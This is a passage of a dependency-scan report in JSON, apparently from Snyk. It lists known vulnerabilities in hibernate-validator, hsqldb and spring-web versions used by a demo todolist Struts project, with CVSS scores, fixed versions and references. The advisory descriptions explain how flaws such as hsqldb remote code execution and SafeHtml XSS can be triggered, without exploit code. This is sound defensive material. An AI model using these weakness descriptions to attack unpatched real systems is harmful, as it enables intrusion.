"https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.29.RELEASE", + "5.0.19.RELEASE", + "5.1.18.RELEASE", + "5.2.9.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/web/util/WebUtils.java", + "className": "WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://tanzu.vmware.com/security/cve-2015-5211", + "title": "CVE-2015-5211" + }, + { + "url": "https://pivotal.io/security/cve-2020-5421", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:04.397840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n## References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n", + "epssDetails": { + "percentile": "0.95901", + "probability": "0.15300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-5421" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2020-09-18T14:36:44.859594Z", + "functions_new": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "className": "org.springframework.web.util.WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T14:23:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2020-09-18T16:17:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:07.572789Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@4.3.29.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE,3.2.9.RELEASE)", + "[4.0.0.RELEASE,4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16390", + "title": "GitHub Issue" + }, + { + "url": "http://www.gopivotal.com/security/cve-2014-0225", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 